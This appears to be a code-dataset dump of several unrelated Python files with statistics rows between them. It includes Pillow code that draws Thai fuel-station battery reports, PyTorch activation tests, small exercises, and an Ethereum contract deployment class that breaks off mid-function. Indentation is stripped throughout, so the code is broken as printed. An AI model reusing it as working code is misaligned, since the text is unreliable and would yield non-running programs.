draw.text((140,900), 'มือจ่าย :' , fill=color, font=fnt_report_name)
draw.text((1230, 900), str(result_site.NOZZLE_num), fill=color, font=fnt_report_name)
draw.text((140,975), 'BatteryVolt. ' , fill=color, font=fnt_report_name)
draw.text((1170, 975), str(result_site.NOZZLE_Battery_Status_Volts), fill=color, font=fnt_report_name)
draw.text((140, 1050), str('SerialNo : '), fill=color, font=fnt_report_name)
draw.text((1080, 1050), str(result_site.NOZZLE_SN), fill=color, font=fnt_report_name)
draw.text((140, 1120), str('LastCon : '), fill=color, font=fnt_report_name)
draw.text((930, 1120), str(result_site.NOZZLE_Last_conn), fill=color, font=fnt_report_name)
draw.text((140, 1200), str('ติิดต่อไม่ได้เมื่อ : '), fill=color, font=fnt_report_name)
draw.text((960, 1200), str(Error_start), fill=color, font=fnt_report_name)
draw.text((140, 1280), str('ติดต่อได้แล้วเมื่อ : '), fill=color, font=fnt_report_name)
draw.text((960, 1280), str(datetime_now), fill=color, font=fnt_report_name)
draw.text((140, 1350), str('ขาดการติดต่อนาน : '), fill=color, font=fnt_report_name)
draw.text((890, 1350), str(day_loss)+' วัน '+str(hours_loss)+' ชม. '+ str(minutes_loss)+' นาที', fill=color, font=fnt_report_name)
draw.text((140, 1420), str('ทีมงาน : '), fill=color, font=fnt_report_name)
draw.text((920, 1420), 'คุณ : '+result_site.site.team_support.team_name, fill=color, font=fnt_report_name)
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
image.save(patch_save, optimize=True, quality=20)
return (patch_save)
def CreatingPictureForBATTERY(Status_in,site_profile):
if Status_in == 'NORMAL':
Header_type = 'BATTERY : NORMAL'
Header_IP_TYPE = 'MWGT : IP '
Status = 'NORMAL'
color_status = 'rgb(0,255,0)'
elif Status_in == 'LOW':
Header_type = 'BATTERY : LOW'
Header_IP_TYPE = 'MWGT : IP '
Status = 'LOW'
color_status = 'rgb(255,128,0)'
elif Status_in == 'ALARM':
Header_type = 'BATTERY : ALARM'
Header_IP_TYPE = 'MWGT : IP '
Status = 'ALARM'
color_status = 'rgb(220,20,60)'
result_site = site_profile # รับค่า return มาจาก linebot/connect_db_profile/get_site_profile ใน index ที่ 0
# day_loss = line_data[0] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 0
# hours_loss = line_data[1] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 1
# minutes_loss = line_data[2] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 2
# datetime_now = line_data[3] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 3
# Error_start = line_data[4] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 4
datetime_now = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
file_path = 'line_folder/picture_store/VIS-FORM.jpg' # Window Server
path_font_check = 'line_folder/font/THSarabunNew.ttf'
path_save_check = 'line_folder/picture_for_send/'+ 'BATTERY' +dt_save+'.jpg'
module_dir = os.path.dirname(__file__) # get current directory
path = os.path.join(module_dir, file_path)# Window Server
path_font = os.path.join(module_dir, path_font_check)# Window Server
patch_save = os.path.join(module_dir, path_save_check)# Window Server
image = Image.open(path)
imageSizeW, imageSizeH = image.size
draw = ImageDraw.Draw(image)
color = 'rgb(0, 0, 0)' # black color
fnt_hardder = ImageFont.truetype(path_font, 120)
fnt_report_name = ImageFont.truetype(path_font, 70)
fnt_report_detail = ImageFont.truetype(path_font, 80)
fnt_report_sub_detail = ImageFont.truetype(path_font, 50)
draw.text((450, 300), datetime_now, fill=color, font=fnt_hardder)
draw.text((430,430), Header_type, fill=color_status, font=fnt_hardder)
draw.text((140, 620), 'สถานี : ' + result_site.site.station_name, fill=color, font=fnt_report_name)
draw.text((140,700), Header_IP_TYPE + str(result_site.site.mwgt_ip), fill=color, font=fnt_report_name)
draw.text((140,760), 'สถานะ ' , fill=color, font=fnt_report_name)
draw.text((1110,760), Status, fill=color_status, font=fnt_report_name)
draw.text((140,830), 'หน้าจ่าย : ' , fill=color, font=fnt_report_name)
draw.text((1230, 830), str(result_site.NOZZLE_pump_log_address), fill=color, font=fnt_report_name)
draw.text((140,900), 'มือจ่าย :' , fill=color, font=fnt_report_name)
draw.text((1230, 900), str(result_site.NOZZLE_num), fill=color, font=fnt_report_name)
draw.text((140,975), 'BatteryVolt. ' , fill=color, font=fnt_report_name)
draw.text((1170, 975), str(result_site.NOZZLE_Battery_Status_Volts), fill=color, font=fnt_report_name)
draw.text((140, 1050), str('SerialNo : '), fill=color, font=fnt_report_name)
draw.text((1080, 1050), str(result_site.NOZZLE_SN), fill=color, font=fnt_report_name)
draw.text((140, 1120), str('LastCon : '), fill=color, font=fnt_report_name)
draw.text((930, 1120), str(result_site.NOZZLE_Last_conn), fill=color, font=fnt_report_name)
# draw.text((140, 1200), str('ติิดต่อไม่ได้เมื่อ : '), fill=color, font=fnt_report_name)
# draw.text((960, 1200), str(Error_start), fill=color, font=fnt_report_name)
# draw.text((140, 1280), str('ขาดการติดต่อเมื่อ : '), fill=color, font=fnt_report_name)
# draw.text((960, 1280), str(datetime_now), fill=color, font=fnt_report_name)
# draw.text((140, 1350), str('ขาดการติดต่อนาน : '), fill=color, font=fnt_report_name)
# draw.text((890, 1350), str(day_loss)+' วัน '+str(hours_loss)+' ชม. '+ str(minutes_loss)+' นาที', fill=color, font=fnt_report_name)
draw.text((140, 1420), str('ทีมงาน : '), fill=color, font=fnt_report_name)
draw.text((920, 1420), 'คุณ : '+result_site.site.team_support.team_name, fill=color, font=fnt_report_name)
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
# path_save = 'line_folder/picture_for_send/'+ 'MWGT-OFFLINE-' +dt_save+'.jpg'
image.save(patch_save, optimize=True, quality=20)
return (patch_save)
| 78.373368 | 145 | 0.650431 | 4,585 | 30,017 | 4.104253 | 0.049291 | 0.064566 | 0.08359 | 0.096928 | 0.971251 | 0.971251 | 0.961845 | 0.961845 | 0.961845 | 0.960091 | 0 | 0.047154 | 0.219309 | 30,017 | 383 | 146 | 78.373368 | 0.742468 | 0.197455 | 0 | 0.884298 | 0 | 0 | 0.101588 | 0.02918 | 0.019284 | 0 | 0 | 0 | 0 | 1 | 0.011019 | false | 0 | 0.019284 | 0 | 0.052342 | 0.011019 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ec3c35548741d9b969ea862d232476adbb76a18f | 207 | py | Python | pylearn2/scripts/tutorials/deep_trainer/test_deep_trainer.py | BouchardLab/pylearn2 | 4cab785b870d22cd9e85a5f536d4cac234b6bf60 | [
"BSD-3-Clause"
] | 2,045 | 2015-01-01T14:07:52.000Z | 2022-03-08T08:56:41.000Z | pylearn2/scripts/tutorials/deep_trainer/test_deep_trainer.py | BouchardLab/pylearn2 | 4cab785b870d22cd9e85a5f536d4cac234b6bf60 | [
"BSD-3-Clause"
] | 305 | 2015-01-02T13:18:24.000Z | 2021-08-20T18:03:28.000Z | pylearn2/scripts/tutorials/deep_trainer/test_deep_trainer.py | BouchardLab/pylearn2 | 4cab785b870d22cd9e85a5f536d4cac234b6bf60 | [
"BSD-3-Clause"
] | 976 | 2015-01-01T17:08:51.000Z | 2022-03-25T19:53:17.000Z | """
A simple unit test of 'run_deep_trainer.py'
"""
from .run_deep_trainer import main
def test_deep_trainer():
# pass args=[] so we can pass options to nosetests on the command line
main(args=[])
| 20.7 | 74 | 0.705314 | 34 | 207 | 4.117647 | 0.735294 | 0.235714 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.188406 | 207 | 9 | 75 | 23 | 0.833333 | 0.545894 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
6b7eeb9d18420ca7553f4a9e568cb130645b147b | 154 | py | Python | URI1096.py | rashidulhasanhridoy/URI-Online-Judge-Problem-Solve-with-Python-3 | c7db434e2e6e40c2ca3bd56db0d04cf79f69de12 | [
"Apache-2.0"
] | 2 | 2020-07-21T18:01:37.000Z | 2021-11-29T01:08:14.000Z | URI1096.py | rashidulhasanhridoy/URI-Online-Judge-Problem-Solve-with-Python-3 | c7db434e2e6e40c2ca3bd56db0d04cf79f69de12 | [
"Apache-2.0"
] | null | null | null | URI1096.py | rashidulhasanhridoy/URI-Online-Judge-Problem-Solve-with-Python-3 | c7db434e2e6e40c2ca3bd56db0d04cf79f69de12 | [
"Apache-2.0"
] | null | null | null | I = -1
for i in range(1, 6):
i = I + 2
print('I=%d J=%d' % (i, 7))
print('I=%d J=%d' % (i, 6))
print('I=%d J=%d' % (i, 5))
I = i | 22 | 32 | 0.344156 | 34 | 154 | 1.558824 | 0.352941 | 0.339623 | 0.396226 | 0.45283 | 0.566038 | 0.566038 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 0.363636 | 154 | 7 | 33 | 22 | 0.469388 | 0 | 0 | 0 | 0 | 0 | 0.181208 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.428571 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
6b7f05121680d5686da6b82b3ed8d583a0cddfe4 | 7,119 | py | Python | tests/layers/test_biased_activations.py | kynk94/torch-firewood | 8ecd03c166bcadaae22a6cb2c1457a82f2c644eb | [
"MIT"
] | 1 | 2022-03-26T12:51:27.000Z | 2022-03-26T12:51:27.000Z | tests/layers/test_biased_activations.py | kynk94/torch-firewood | 8ecd03c166bcadaae22a6cb2c1457a82f2c644eb | [
"MIT"
] | null | null | null | tests/layers/test_biased_activations.py | kynk94/torch-firewood | 8ecd03c166bcadaae22a6cb2c1457a82f2c644eb | [
"MIT"
] | null | null | null | import random
import pytest
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import Tensor
from firewood.layers.biased_activations import BiasedActivation
from tests.helpers.runif import runif
from tests.stylegan3.torch_utils.ops.bias_act import activation_funcs, bias_act
@pytest.mark.xfail(raises=ValueError)
def test_not_supported_activation_func():
BiasedActivation(activation="invalid")
def test_bias_gain_clamp():
bias_gain = 0.5
biased_activation = BiasedActivation(
activation="relu", gain=1.0, bias_gain=bias_gain, clamp=0.5
)
relu = nn.ReLU()
input = torch.randn(2, 3, 5, 5)
bias = torch.randn(3)
biased_activation_output: Tensor = biased_activation(input, bias)
relu_output: Tensor = relu(input + bias_gain * bias.view(1, -1, 1, 1))
relu_output = relu_output.clamp_(-0.5, 0.5)
assert torch.allclose(
biased_activation_output, relu_output
), f"Forward result mismatch. l1: {F.l1_loss(biased_activation_output, relu_output)}"
@pytest.mark.parametrize("activation", activation_funcs)
def test_with_bias_cpu(activation: str) -> None:
lr = 1e-2
embedding_size = random.randint(1, 32)
alpha = activation_funcs[activation]["def_alpha"]
if activation == "elu":
alpha = 1.0
custom_operation = BiasedActivation(activation, alpha=alpha)
x_custom = torch.randn(2, embedding_size, requires_grad=True)
b_custom = torch.randn(embedding_size, requires_grad=True)
x_original = x_custom.detach().requires_grad_()
b_original = b_custom.detach().requires_grad_()
optimizer_custom = torch.optim.Adam([x_custom, b_custom], lr=lr)
optimizer_original = torch.optim.Adam([x_original, b_original], lr=lr)
optimizer_custom.zero_grad()
optimizer_original.zero_grad()
y_custom: Tensor = custom_operation(x_custom, b_custom)
y_original: Tensor = bias_act(
x_original,
b_original,
act=activation,
alpha=alpha,
gain=custom_operation.gain,
impl="ref",
)
assert torch.allclose(
y_custom, y_original
), f"Forward result mismatch. l1: {F.l1_loss(y_custom, y_original)}"
loss_custom = y_custom.square().sum()
loss_original = y_original.square().sum()
loss_custom.backward()
loss_original.backward()
optimizer_custom.step()
optimizer_original.step()
assert torch.allclose(
x_custom, x_original
), f"Backward input mismatch. l1: {F.l1_loss(x_custom, x_original)}"
assert torch.allclose(
b_custom, b_original
), f"Backward bias mismatch. l1: {F.l1_loss(b_custom, b_original)}"
@pytest.mark.parametrize("activation", activation_funcs)
def test_without_bias_cpu(activation: str) -> None:
lr = 1e-2
embedding_size = random.randint(1, 32)
alpha = activation_funcs[activation]["def_alpha"]
if activation == "elu":
alpha = 1.0
custom_operation = BiasedActivation(activation, alpha=alpha)
x_custom = torch.randn(2, embedding_size, requires_grad=True)
x_original = x_custom.detach().requires_grad_()
optimizer_custom = torch.optim.Adam([x_custom], lr=lr)
optimizer_original = torch.optim.Adam([x_original], lr=lr)
optimizer_custom.zero_grad()
optimizer_original.zero_grad()
y_custom: Tensor = custom_operation(x_custom)
y_original: Tensor = bias_act(
x_original,
act=activation,
alpha=alpha,
gain=custom_operation.gain,
impl="ref",
)
assert torch.allclose(
y_custom, y_original
), f"Forward result mismatch. l1: {F.l1_loss(y_custom, y_original)}"
loss_custom = y_custom.square().sum()
loss_original = y_original.square().sum()
loss_custom.backward()
loss_original.backward()
optimizer_custom.step()
optimizer_original.step()
assert torch.allclose(
x_custom, x_original
), f"Backward result mismatch. l1: {F.l1_loss(x_custom, x_original)}"
@runif(min_gpus=1)
@pytest.mark.parametrize("activation", activation_funcs)
def test_with_bias_gpu(activation: str) -> None:
lr = 1e-2
embedding_size = random.randint(1, 32)
alpha = activation_funcs[activation]["def_alpha"]
custom_operation = BiasedActivation(activation, alpha=alpha).cuda()
x_custom = torch.randn(2, embedding_size, requires_grad=True, device="cuda")
b_custom = torch.randn(embedding_size, requires_grad=True, device="cuda")
x_original = x_custom.detach().requires_grad_()
b_original = b_custom.detach().requires_grad_()
optimizer_custom = torch.optim.Adam([x_custom, b_custom], lr=lr)
optimizer_original = torch.optim.Adam([x_original, b_original], lr=lr)
optimizer_custom.zero_grad()
optimizer_original.zero_grad()
y_custom: Tensor = custom_operation(x_custom, b_custom)
y_original: Tensor = bias_act(
x_original,
b_original,
act=activation,
alpha=alpha,
gain=custom_operation.gain,
impl="cuda",
)
assert torch.allclose(
y_custom, y_original
), f"Forward result mismatch. l1: {F.l1_loss(y_custom, y_original)}"
loss_custom = y_custom.square().sum()
loss_original = y_original.square().sum()
loss_custom.backward()
loss_original.backward()
optimizer_custom.step()
optimizer_original.step()
assert torch.allclose(
x_custom, x_original
), f"Backward input mismatch. l1: {F.l1_loss(x_custom, x_original)}"
assert torch.allclose(
b_custom, b_original
), f"Backward bias mismatch. l1: {F.l1_loss(b_custom, b_original)}"
@runif(min_gpus=1)
@pytest.mark.parametrize("activation", activation_funcs)
def test_without_bias_gpu(activation: str) -> None:
lr = 1e-2
embedding_size = random.randint(1, 32)
alpha = activation_funcs[activation]["def_alpha"]
custom_operation = BiasedActivation(activation, alpha=alpha).cuda()
x_custom = torch.randn(2, embedding_size, requires_grad=True, device="cuda")
x_original = x_custom.detach().requires_grad_()
optimizer_custom = torch.optim.Adam([x_custom], lr=lr)
optimizer_original = torch.optim.Adam([x_original], lr=lr)
optimizer_custom.zero_grad()
optimizer_original.zero_grad()
y_custom: Tensor = custom_operation(x_custom)
y_original: Tensor = bias_act(
x_original,
act=activation,
alpha=alpha,
gain=custom_operation.gain,
impl="cuda",
)
assert torch.allclose(
y_custom, y_original
), f"Forward result mismatch. l1: {F.l1_loss(y_custom, y_original)}"
loss_custom = y_custom.square().sum()
loss_original = y_original.square().sum()
loss_custom.backward()
loss_original.backward()
optimizer_custom.step()
optimizer_original.step()
assert torch.allclose(
x_custom, x_original
), f"Backward result mismatch. l1: {F.l1_loss(x_custom, x_original)}"
| 33.580189 | 90 | 0.67959 | 920 | 7,119 | 4.979348 | 0.102174 | 0.036673 | 0.039293 | 0.031216 | 0.858983 | 0.845012 | 0.845012 | 0.845012 | 0.838245 | 0.830823 | 0 | 0.012786 | 0.209018 | 7,119 | 211 | 91 | 33.739336 | 0.800746 | 0 | 0 | 0.796512 | 0 | 0 | 0.118413 | 0.005211 | 0 | 0 | 0 | 0 | 0.063953 | 1 | 0.034884 | false | 0 | 0.052326 | 0 | 0.087209 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6beada6df0c6ffe24f1a9bfee8935f0c0ec8d510 | 42 | py | Python | code/argv_list.py | seanemccartney/python-novice-inflammation | 7836d4f57cbe04d9ca4025916a7c88f64f9d63f9 | [
"CC-BY-4.0"
] | 265 | 2015-01-19T15:31:57.000Z | 2022-03-26T16:46:54.000Z | code/argv_list.py | seanemccartney/python-novice-inflammation | 7836d4f57cbe04d9ca4025916a7c88f64f9d63f9 | [
"CC-BY-4.0"
] | 817 | 2015-01-02T22:20:00.000Z | 2022-03-24T21:06:07.000Z | code/argv_list.py | seanemccartney/python-novice-inflammation | 7836d4f57cbe04d9ca4025916a7c88f64f9d63f9 | [
"CC-BY-4.0"
] | 851 | 2015-01-03T15:12:23.000Z | 2022-03-30T20:41:15.000Z | import sys
print('sys.argv is', sys.argv)
| 14 | 30 | 0.714286 | 8 | 42 | 3.75 | 0.625 | 0.466667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119048 | 42 | 2 | 31 | 21 | 0.810811 | 0 | 0 | 0 | 0 | 0 | 0.261905 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
d40432141ed220f18912110b3f4ce36b93210428 | 21,842 | py | Python | cobra/project/migration/deployment.py | frankenstien-831/cobra | a2ec3ed1038c9606ed7e6978b5bf88f08fd2fc7f | [
"MIT"
] | 53 | 2019-07-14T07:19:56.000Z | 2022-03-25T06:56:04.000Z | cobra/project/migration/deployment.py | frankenstien-831/cobra | a2ec3ed1038c9606ed7e6978b5bf88f08fd2fc7f | [
"MIT"
] | 1 | 2019-07-16T17:45:57.000Z | 2019-07-17T22:16:09.000Z | cobra/project/migration/deployment.py | frankenstien-831/cobra | a2ec3ed1038c9606ed7e6978b5bf88f08fd2fc7f | [
"MIT"
] | 11 | 2019-07-14T09:26:12.000Z | 2021-12-10T11:23:19.000Z | from cobra.project.migration import *
import web3
class Deployment(Provider):
def __init__(self, _network, more=False):
self.more = more
self.network = _network
self.web3 = self.get_web3()
self.account = self.get_account()
self.hdwallet = self.get_hdwallet()
def get_transact(self, artifact):
try:
networks = artifact["networks"]
if networks:
for __network in networks.keys():
deployed = networks.get(__network)
if "contractAddress" in deployed and "transactionHash" in deployed:
if deployed["contractAddress"] == "Unknown" and deployed["transactionHash"]:
try:
get_transaction_receipt = self.web3.eth\
.getTransactionReceipt(deployed["transactionHash"])
if get_transaction_receipt:
deployed["contractAddress"] = get_transaction_receipt["contractAddress"]
artifact['updatedAt'] = str(datetime.now())
else:
continue
except ValueError:
continue
else:
continue
else:
continue
return artifact
except requests.exceptions.ConnectionError:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "HTTPConnectionPool")
sys.exit()
except websockets.exceptions.InvalidMessage:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "WebSocketsConnectionPool")
sys.exit()
except FileNotFoundError:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "ICPConnectionPool")
sys.exit()
except KeyError as key_error:
console_log(str(key_error), "error", "KeyError")
sys.exit()
def is_deployed(self, artifact):
try:
networks = artifact['networks']
if networks:
for __network in networks.keys():
deployed = networks.get(__network)
try:
deployed_web3 = self.web3.eth.getTransactionReceipt(deployed['transactionHash'])
if deployed['contractAddress'] == deployed_web3['contractAddress']:
return True
else:
continue
except TypeError:
continue
else:
self.web3.eth.getTransactionReceipt(str())
return False
except requests.exceptions.ConnectionError:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "HTTPConnectionPool")
sys.exit()
except websockets.exceptions.InvalidMessage:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "WebSocketsConnectionPool")
sys.exit()
except FileNotFoundError:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "ICPConnectionPool")
sys.exit()
except KeyError:
return False
def get_links_address(self, dir_path, links):
contract_name_and_address = dict()
contract_name_and_unknown_address = dict()
for link in links:
link_file_path = join(dir_path, link)
artifact_not_loads = file_reader(link_file_path)
try:
artifact = loads(artifact_not_loads)
if 'networks' in artifact:
networks = artifact['networks']
if not networks:
link_name = link[:-5]
contract_name_and_unknown_address.setdefault(link_name, "Unknown")
continue
for __network in networks.keys():
deployed = networks.get(__network)
if "contractAddress" in deployed and "transactionHash" in deployed:
try:
if deployed["contractAddress"] and deployed["transactionHash"]:
deployed_web3 = self.web3.eth.getTransactionReceipt(deployed['transactionHash'])
if deployed_web3 is not None: # TypeError
if deployed['contractAddress'] == deployed_web3['contractAddress']:
link_name = link[:-5]
contract_name_and_address.setdefault(link_name, deployed['contractAddress'])
else:
link_name = link[:-5]
contract_name_and_unknown_address.setdefault(link_name, "Unknown")
elif deployed['contractAddress'] == "Unknown":
link_name = link[:-5]
contract_name_and_unknown_address.setdefault(link_name, "Unknown")
except ValueError:
continue
else:
continue
else:
console_log("networks in %s" % str(link), "error", "NotFound")
except json.decoder.JSONDecodeError as jsonDecodeError:
console_log(str(jsonDecodeError), "error", "JSONDecodeError")
sys.exit()
return contract_name_and_address, contract_name_and_unknown_address
def deploy_contract(self, contract):
try:
if self.account is not None:
# self.web3.personal.unlockAccount(self.hdwallet['private_key'], None)
if 'gas' in self.account:
if 'gas_price' in self.account:
transaction = {
'from': self.web3.toChecksumAddress(self.account['address']),
'gas': self.account['gas'],
'gasPrice': self.account['gas_price']
}
tx_hash = contract.deploy(transaction=transaction)
return tx_hash
else:
transaction = {
'from': self.web3.toChecksumAddress(self.account['address']),
'gas': self.account['gas'],
'gasPrice': self.web3.eth.gasPrice
}
tx_hash = contract.deploy(transaction=transaction)
return tx_hash
else:
if 'gas_price' in self.account:
transaction = {
'from': self.web3.toChecksumAddress(self.account['address']),
'gas': 3000000,
'gasPrice': self.account['gas_price']
}
tx_hash = contract.deploy(transaction=transaction)
return tx_hash
else:
transaction = {
'from': self.web3.toChecksumAddress(self.account['address']),
'gas': 3000000,
'gasPrice': self.web3.eth.gasPrice
}
tx_hash = contract.deploy(transaction=transaction)
return tx_hash
elif self.hdwallet is not None:
if 'gas' in self.hdwallet:
if 'gas_price' in self.hdwallet:
account = self.web3.eth.account.privateKeyToAccount(self.hdwallet['private_key'])
construct_txn = contract.constructor().buildTransaction({
'from': account.address,
'value': 0,
'nonce': self.web3.eth.getTransactionCount(account.address),
'gas': self.hdwallet['gas'],
'gasPrice': self.hdwallet['gas_price']
})
signed = account.signTransaction(construct_txn)
tx_hash = self.web3.eth.sendRawTransaction(signed.rawTransaction)
return tx_hash
else:
account = self.web3.eth.account.privateKeyToAccount(self.hdwallet['private_key'])
construct_txn = contract.constructor().buildTransaction({
'from': account.address,
'value': 0,
'nonce': self.web3.eth.getTransactionCount(account.address),
'gas': self.hdwallet['gas'],
'gasPrice': self.web3.eth.gasPrice
})
signed = account.signTransaction(construct_txn)
tx_hash = self.web3.eth.sendRawTransaction(signed.rawTransaction)
return tx_hash
else:
if 'gas_price' in self.hdwallet:
account = self.web3.eth.account.privateKeyToAccount(self.hdwallet['private_key'])
construct_txn = contract.constructor().buildTransaction({
'from': account.address,
'value': 0,
'nonce': self.web3.eth.getTransactionCount(account.address),
'gas': 3000000,
'gasPrice': self.hdwallet['gas_price']
})
signed = account.signTransaction(construct_txn)
tx_hash = self.web3.eth.sendRawTransaction(signed.rawTransaction)
return tx_hash
else:
account = self.web3.eth.account.privateKeyToAccount(self.hdwallet['private_key'])
construct_txn = contract.constructor().buildTransaction({
'from': account.address,
'value': 0,
'nonce': self.web3.eth.getTransactionCount(account.address),
'gas': 3000000,
'gasPrice': self.web3.eth.gasPrice
})
signed = account.signTransaction(construct_txn)
tx_hash = self.web3.eth.sendRawTransaction(signed.rawTransaction)
return tx_hash
else:
transaction = {
'from': self.web3.eth.accounts[0],
'gas': 3000000,
'gasPrice': self.web3.eth.gasPrice
}
tx_hash = contract.constructor().transact(transaction=transaction)
return tx_hash
except ValueError as valueError:
value_error = valueError.args.__getitem__(0)
if 'message' in value_error and not self.more:
message = str(value_error['message'])
split_message = message.split('\n')
console_log("%s" % split_message[0],
"error")
elif 'message' in value_error and self.more:
message = str(value_error['message'])
console_log("%s" % message,
"error")
elif not self.more:
message = str(value_error)
console_log("%s..." % message[:75],
"error")
elif self.more:
message = str(value_error)
console_log("%s..." % message,
"error")
sys.exit()
@staticmethod
def check_unknown_addresses(link_unknown_address):
if isinstance(link_unknown_address, dict) and link_unknown_address:
for contract_name in link_unknown_address.keys():
console_log(title="Unknown", _type="error",
text="%s link address!" % str(contract_name))
sys.exit()
return
def deploy_with_link(self, dir_path, contract, links, more=False):
contract_name = str(contract[:-5])
file_path = join(dir_path, contract)
artifact_not_loads = file_reader(file_path)
try:
_artifact = loads(artifact_not_loads)
except json.decoder.JSONDecodeError as jsonDecodeError:
console_log("%s" % jsonDecodeError, "error", "JSONDecodeError")
return
artifact = self.get_transact(_artifact)
if not self.is_deployed(artifact):
console_log("Deploying " + contract_name + "...")
abi = artifact['abi']
unlinked_bytecode = artifact['bin']
get_link_address, get_link_unknown_address = self.get_links_address(dir_path, links)
self.check_unknown_addresses(get_link_unknown_address)
linked_bytecode = link_code(unlinked_bytecode, get_link_address)
try:
contract = self.web3.eth.contract(abi=abi, bytecode=linked_bytecode)
# Deploying contract and received transaction hash
try:
tx_hash = self.deploy_contract(contract)
except requests.exceptions.ConnectionError:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "HTTPConnectionPool")
sys.exit()
except websockets.exceptions.InvalidMessage:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "WebSocketsConnectionPool")
sys.exit()
except FileNotFoundError:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "ICPConnectionPool")
sys.exit()
try:
transaction_receipt = self.web3.eth.waitForTransactionReceipt(tx_hash, timeout=720)
address = transaction_receipt['contractAddress']
deployed = {
"links": dict(),
"contractAddress": address,
"transactionHash": self.web3.toHex(tx_hash)
}
link = deployed.get("links")
for index, get_link in enumerate(list(get_link_address.keys())):
link.setdefault(list(get_link_address)[index], get_link_address.get(get_link))
artifact['networks'].setdefault(generate_numbers(), deployed)
artifact['updatedAt'] = str(datetime.now())
console_log(title="Deploy",
text="%s done!" % contract_name, _type="success")
console_log(title="TransactionHash", space=True,
text=str(self.web3.toHex(tx_hash)), _type="success")
console_log(title="Address", space=True,
text=str(address), _type="success")
artifact = self.web3.toText(dumps(artifact, indent=1).encode())
return artifact
except web3.utils.threads.Timeout as timeout:
address = "Unknown"
deployed = {
"links": dict(),
"contractAddress": address,
"transactionHash": self.web3.toHex(tx_hash)
}
link = deployed.get("links")
for index, get_link in enumerate(list(get_link_address.keys())):
link.setdefault(list(get_link_address)[index], get_link_address.get(get_link))
artifact['networks'].setdefault(generate_numbers(), deployed)
artifact['updatedAt'] = str(datetime.now())
console_log(title="Deploy",
text="%s not done!" % contract_name, _type="warning")
console_log(title="TransactionHash", space=True,
text=str(self.web3.toHex(tx_hash)), _type="warning")
console_log(title="Address", space=True,
text=str(address), _type="warning")
console_log(title="Timeout", _type="error",
text="%s, %s still on mining!" % (str(timeout),
str(self.web3.toHex(tx_hash))))
artifact = self.web3.toText(dumps(artifact, indent=1).encode())
return artifact
except KeyError:
artifact = self.web3.toText(dumps(artifact, indent=1).encode())
return artifact
else:
console_log(title="Deploy", text="Already deployed.%s" %
contract_name, _type="warning")
artifact = self.web3.toText(dumps(artifact, indent=1).encode())
return artifact
def deploy_with_out_link(self, dir_path, contract, more=False):
file_path = join(dir_path, contract)
contract_name = str(contract[:-5])
artifact_not_loads = file_reader(file_path)
try:
_artifact = loads(artifact_not_loads)
except json.decoder.JSONDecodeError as jsonDecodeError:
console_log(jsonDecodeError, "error", "JSONDecodeError")
sys.exit()
artifact = self.get_transact(_artifact)
if not self.is_deployed(artifact):
console_log("Deploying " + contract_name + "...")
abi = artifact['abi']
bytecode = artifact['bin']
contract = self.web3.eth.contract(abi=abi, bytecode=bytecode)
# Deploying contract and received transaction hash
try:
tx_hash = self.deploy_contract(contract)
except requests.exceptions.ConnectionError:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "HTTPConnectionPool")
